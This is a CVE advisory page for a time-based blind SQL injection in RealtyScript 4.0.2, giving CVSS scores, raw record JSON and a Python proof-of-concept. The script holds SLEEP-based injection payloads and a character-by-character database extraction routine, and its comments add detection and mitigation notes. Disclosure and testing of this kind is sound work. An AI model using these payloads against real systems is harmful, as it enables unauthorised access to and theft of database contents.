Security Vulnerability Report
CVE-2015-20120 CVSS 8.2 HIGH

CVE-2015-20120

Published: 2026-03-16 14:17:48
Last Modified: 2026-03-19 14:15:54

Description

Next Click Ventures RealtyScript 4.0.2 contains multiple time-based blind SQL injection vulnerabilities that allow unauthenticated attackers to extract database information by injecting SQL code into application parameters. Attackers can craft requests with time-delay payloads to infer database contents character by character based on response timing differences.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
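CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N (Secondary-source score; the raw record below also carries a Primary CVSS 3.1 assessment of 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, and a CVSS 4.0 score of 8.8 HIGH)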

Configurations (Affected Products)

cpe:2.3:a:nextclickventures:realtyscript:4.0.2:*:*:*:*:*:*:* - VULNERABLE
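RealtyScript < 4.0.2 (note: the CPE entry and the description identify version 4.0.2 itself as vulnerable; this "< 4.0.2" range does not appear in the record's configuration data)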
Next Click Ventures RealtyScript 4.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import time

# CVE-2015-20120 Time-based Blind SQL Injection PoC
# Target: Next Click Ventures RealtyScript 4.0.2
# Vulnerable Parameters: search, quick_search, contact
#
# NOTE(review): the advisory record on this page names no endpoint and no
# parameter. TARGET_URL and the three parameter names are the listing's own
# values; confirm them against the referenced advisories before reading a
# negative result as "not affected".
#
# Detection: every probe carries a SQL timing function (SLEEP) inside an
# ordinary query-string value, and the extraction routine sends long runs of
# near-identical requests that differ only in a position and a character code.
# Both patterns are visible in web-server access logs and to a WAF.
# Mitigation (weakness class CWE-89): bind request values as query parameters
# instead of concatenating them into SQL text.
TARGET_URL = "http://target.com/search"


def _timed_get(params):
    """Send one GET to TARGET_URL with *params* and return the elapsed seconds."""
    began = time.time()
    requests.get(TARGET_URL, params=params)
    return time.time() - began


def test_vulnerability(param_name, param_value):
    """Probe one parameter with a SLEEP(5) payload and report a delayed reply.

    Two requests are sent: one with the plain value and one with the value
    followed by the timing payload. The plain-request time is only printed;
    the verdict rests on the fixed 4-second threshold alone, so a server that
    is slow for unrelated reasons is also reported as vulnerable.

    Returns True when the probe took longer than 4 seconds, otherwise False.
    """
    normal_time = _timed_get({param_name: param_value})

    sql_payload = f"{param_value}' AND SLEEP(5)---"
    vuln_time = _timed_get({param_name: sql_payload})

    if vuln_time <= 4:
        return False

    print(f"[+] VULNERABLE: {param_name} parameter")
    print(f" Normal time: {normal_time:.2f}s")
    print(f" With SLEEP(5): {vuln_time:.2f}s")
    return True


def extract_data_via_blind_sqli(param_name, query):
    """Infer the result of *query* one character at a time from response delays.

    For each position in range(1, 50), i.e. positions 1 through 49, every
    printable ASCII code (32..126) is tried in turn. A reply slower than
    1.5 seconds is taken as a match for that character. A position with no
    slow reply contributes nothing and the scan moves on to the next one.

    Returns the characters collected, as a string.
    """
    extracted = ""
    for pos in range(1, 50):
        for ascii_val in range(32, 127):
            payload = f"test' AND (SELECT CASE WHEN (ASCII(SUBSTRING(({query}),{pos},1))={ascii_val}) THEN SLEEP(2) ELSE 0 END))---"
            elapsed = _timed_get({param_name: payload})
            if elapsed > 1.5:
                extracted += chr(ascii_val)
                print(f"[*] Extracted so far: {extracted}")
                break
    return extracted


# Script entry point: only the detection probe is run, once per parameter name.
if __name__ == "__main__":
    print("[*] Testing CVE-2015-20120 - RealtyScript Blind SQLi")
    for candidate in ("search", "quick_search", "contact"):
        test_vulnerability(candidate, "test")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2015-20120", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:47.957", "lastModified": "2026-03-19T14:15:53.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next Click Ventures RealtyScript 4.0.2 contains multiple time-based blind SQL injection vulnerabilities that allow unauthenticated attackers to extract database information by injecting SQL code into application parameters. Attackers can craft requests with time-delay payloads to infer database contents character by character based on response timing differences."}, {"lang": "es", "value": "Next Click Ventures RealtyScript 4.0.2 contiene múltiples vulnerabilidades de inyección SQL ciega basada en tiempo que permiten a atacantes no autenticados extraer información de la base de datos inyectando código SQL en los parámetros de la aplicación. Los atacantes pueden elaborar solicitudes con cargas útiles de retardo de tiempo para inferir el contenido de la base de datos carácter por carácter basándose en las diferencias de tiempo de respuesta."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextclickventures:realtyscript:4.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "237FBCF4-383B-4460-82EF-FC61A749D53B"}]}]}], "references": [{"url": 
"https://www.exploit-db.com/exploits/38497", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/realtyscript-multiple-time-based-blind-sql-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}